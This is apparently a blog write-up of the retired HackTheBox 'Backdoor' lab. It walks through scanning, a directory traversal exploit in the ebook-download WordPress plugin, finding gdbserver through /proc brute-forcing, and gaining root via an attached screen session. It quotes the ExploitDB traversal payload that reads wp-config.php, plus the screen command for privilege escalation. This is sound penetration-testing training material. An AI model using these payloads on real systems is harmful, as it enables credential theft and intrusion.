The Backdoor machine on HackTheBox has just retired! This is my write-up about the Backdoor machine on HackTheBox. Here I detail the penetration testing steps taken to scan, exploit, and privilege escalate on this target machine. This machine is categorized as easy and was retired on April 23, 2022.
IP Address: 10.10.11.125
A vulnerable WordPress plugin allows for local file inclusion. Local file inclusion provides read access to identify a GDB service running on a special port. The GDB service can be exploited for code execution and initial access. The screen utility with SUID allows for connection to an active root-level terminal session for root privileges.
The Nmap scan shows that there is an HTTP server on port
80/tcp and some interesting service on port
# nmap -sV -sC -p- 10.10.11.125 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-22 17:41 EDT Nmap scan report for 10.10.11.125 Host is up (0.069s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA) | 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA) |_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-generator: WordPress 5.8.1 |_http-title: Backdoor – Real-Life 1337/tcp open waste? Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 54.18 seconds
We can see that the website is a plain site running on port
80/tcp. Nothing here of interest.
Nikto tells us that there is WordPress running on the target and that a few interesting directories are available.
# nikto --host http://10.10.11.125/ - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.11.125 + Target Hostname: 10.10.11.125 + Target Port: 80 + Start Time: 2022-04-22 17:41:43 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.41 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'link' found, with multiple values: (<http://10.10.11.125/index.php/wp-json/>; rel="https://api.w.org/",<http://10.10.11.125/index.php/wp-json/wp/v2/pages/11>; rel="alternate"; type="application/json",<http://10.10.11.125/>; rel=shortlink,) + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Uncommon header 'x-redirect-by' found, with contents: WordPress + No CGI Directories found (use '-C all' to force check all possible dirs) + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /wp-links-opml.php: This WordPress script reveals the installed version. + OSVDB-3092: /license.txt: License file found may identify site software. + /: A WordPress installation was found. + Cookie wordpress_test_cookie created without the httponly flag + OSVDB-3268: /wp-content/uploads/: Directory indexing found. + /wp-content/uploads/: WordPress uploads directory is browsable. This may reveal sensitive information + /wp-login.php: WordPress login found + 7889 requests: 0 error(s) and 13 item(s) reported on remote host + End Time: 2022-04-22 17:50:14 (GMT-4) (511 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Gobuster shows a few more interesting WordPress directories to check out.
# gobuster dir -u http://10.10.11.125/ -w /usr/share/wordlists/dirpwn.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.11.125/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirpwn.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/04/22 17:41:55 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 277] /.htaccess (Status: 403) [Size: 277] /.htaccess (Status: 403) [Size: 277] /.htpasswd (Status: 403) [Size: 277] /.htpasswd (Status: 403) [Size: 277] /index.php (Status: 301) [Size: 0] [--> http://10.10.11.125/] /server-status (Status: 403) [Size: 277] /server-status (Status: 403) [Size: 277] /wp-admin (Status: 301) [Size: 315] [--> http://10.10.11.125/wp-admin/] /wp-admin (Status: 301) [Size: 315] [--> http://10.10.11.125/wp-admin/] /wp-content (Status: 301) [Size: 317] [--> http://10.10.11.125/wp-content/] /wp-includes (Status: 301) [Size: 318] [--> http://10.10.11.125/wp-includes/] /xmlrpc.php (Status: 405) [Size: 42] =============================================================== 2022/04/22 18:03:36 Finished ===============================================================
WPScan provided a lot of information, some of which I cut here to save space. The key information it found was a vulnerable ebook-download plugin.
# wpscan --url http://10.10.11.125/ -e ap,u --plugins-detection aggressive _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.20 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://10.10.11.125/ [10.10.11.125] [+] Started: Fri Apr 22 17:43:29 2022 Interesting Finding(s): -----SNIP----- [+] Enumerating All Plugins (via Aggressive Methods) Checking Known Locations - Time: 00:19:43 <========================================================================> (97836 / 97836) 100.00% Time: 00:19:43 [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] ebook-download | Location: http://10.10.11.125/wp-content/plugins/ebook-download/ | Last Updated: 2020-03-12T12:52:00.000Z | Readme: http://10.10.11.125/wp-content/plugins/ebook-download/readme.txt | [!] The version is out of date, the latest version is 1.5 | [!] Directory listing is enabled | | Found By: Known Locations (Aggressive Detection) | - http://10.10.11.125/wp-content/plugins/ebook-download/, status: 200 | | [!] 1 vulnerability identified: | | [!] Title: Ebook Download < 1.2 - Directory Traversal | Fixed in: 1.2 | References: | - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10924 | | Version: 1.1 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://10.10.11.125/wp-content/plugins/ebook-download/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://10.10.11.125/wp-content/plugins/ebook-download/readme.txt [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <==============================================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Finished: Fri Apr 22 18:03:33 2022 [+] Requests Done: 97915 [+] Cached Requests: 7 [+] Data Sent: 26.27 MB [+] Data Received: 28.875 MB [+] Memory used: 468.273 MB [+] Elapsed time: 00:20:04
The identified “ebook-download” plugin can be accessed directly with a directory listing.
Looking at the plugin’s readme, we can see it is version 1.1.
A directory traversal vulnerability is present in “ebook-download” version 1.1 and there is an exploit available in ExploitDB. Let’s try it.
WordPress Plugin eBook Download 1.1 – Directory Traversal
# Exploit Title: WordPress eBook Download 1.1 | Directory Traversal # Exploit Author: Wadeek # Website Author: https://github.com/Wad-Deek # Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip # Version: 1.1 # Tested on: Xampp on Windows7 [Version Disclosure] ====================================== http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt ====================================== [PoC] ====================================== /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php ======================================
Run the exploit from ExploitDB.
The exploit works! We’re able to read local files on the target. We can even get the WordPress database password but this won’t do any good because we don’t have a way to access the database. There doesn’t seem to be any password reuse for SSH or the WordPress admin login either. Some other file will need to be read to gain initial access.
This blog post suggests brute-forcing the
/proc directory for different PIDs to identify running services on the system. Remember, everything in Linux is a file. This may help us identify what service is really running on port
Using Burp Suite Intruder, I brute-forced web requests to identify any possible PIDs running a service on the target. The directory checked was
/proc/[PID]/cmdline. I eventually got a hit! PID 844 showed
gdbserver listing on port
1337/tcp. That’s our target service.
A quick Google search for connecting to
gdbserver revealed that there is a Metasploit module to obtain a shell on the target. A quick Metasploit setup was needed and then I had initial user-level access to the target.
Going through my normal privilege escalation processes of checking sudo, SUIDs, writable files, etc. I eventually came around to running Pspy to see if I could pick up on any processes running that I didn’t see before. I ended up seeing an interesting
screen command running with the name of root.
Pairing this information with seeing SUID set for
screen in my previous enumeration, this looked like a privilege escalation route.
Checking the help menu for
screen showed an interesting
-x option that allows us to “Attach to a not detached screen.”
At first, attempting this in my Meterpreter shell caused some issues, so I had to upgrade my shell and work through those issues first.
Setting a terminal type then running the following command worked!
export TERM=xterm screen -x root/root
We have the root-level shell.
Other than the points on HackTheBox, the lessons learned are the real treasures for this box.
- Using file read vulnerabilities to check for running processes in
/procis extremely valuable! The methodology used for this box, and other methodologies like the one mentioned here are very useful when trying to gain initial access from a file read vulnerability.
- Pspy is awesome. As much as Pspy always seems to be a last resort for me, it always wins. The tool gives visibility into activity on the box that you would never see otherwise.
Thank you for reading my write-up for the Backdoor machine on HackTheBox. Be sure to check out my other write-ups for HackTheBox!